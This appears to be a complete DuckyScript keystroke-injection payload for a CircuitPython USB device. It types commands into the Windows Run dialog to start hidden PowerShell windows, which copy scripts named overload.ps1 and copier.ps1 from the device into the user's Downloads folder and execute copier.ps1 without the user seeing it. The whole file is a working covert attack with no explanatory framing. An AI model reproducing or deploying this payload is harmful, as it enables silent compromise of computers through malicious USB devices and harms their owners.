DELAY 500
GUI r
STRING r
DELAY 700
STRING powershell -WindowStyle Hidden -Command "Copy-Item -Path ($((Get-Volume -FileSystemLabel 'CIRCUITPY').DriveLetter + ':\overload.ps1')) -Destination ($env:USERPROFILE + '\Downloads\o.ps1') -Force"
DELAY 100
ENTER
DELAY 3000
GUI r
STRING r
DELAY 800
STRING powershell -WindowStyle Hidden -Command "Copy-Item -Path ($((Get-Volume -FileSystemLabel 'CIRCUITPY').DriveLetter + ':\copier.ps1')) -Destination ($env:USERPROFILE + '\Downloads\c.ps1');& "$env:USERPROFILE\Downloads\c.ps1""
DELAY 100
ENTER
DELAY 100
ESC
DELAY 200000
